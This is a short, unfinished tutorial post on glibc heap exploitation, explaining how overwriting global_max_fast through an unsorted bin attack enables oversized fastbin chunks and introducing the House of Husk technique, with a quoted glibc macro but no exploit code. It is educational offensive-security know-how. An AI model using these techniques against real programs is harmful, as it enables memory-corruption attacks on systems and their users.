Here, we are going to cover some more interesting concepts involved in Glibc heap exploitation.

global_max_fast

global_max_fast is a global variable that holds the size of the largest fastbin. In glibc, the size range of fastbins is (0x20 to 0x80). Changing the value of global_max_fast to a large positive value allows the attacker to create fast chunks of enormous size which can further be used to perform a fastbin attack. The value of global_max_fast can be easily modfied by executing an Unsorted bin attack. Thus, large free chunks will get inserted into the fastbin instead of any other bin.

House of Husk

This is an awesome technique developed by ptr-yudai . The default value of global_max_fast is a fixed value

#define set_max_fast(s) \
  global_max_fast = (((s) == 0)                                                      \
                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))

We know that the pointers to fastbins are stored in the main_arena. Thus, modifying the value of global_max_fast to a large value will allow us to overwrite the data present in the main_arena.

To be continued…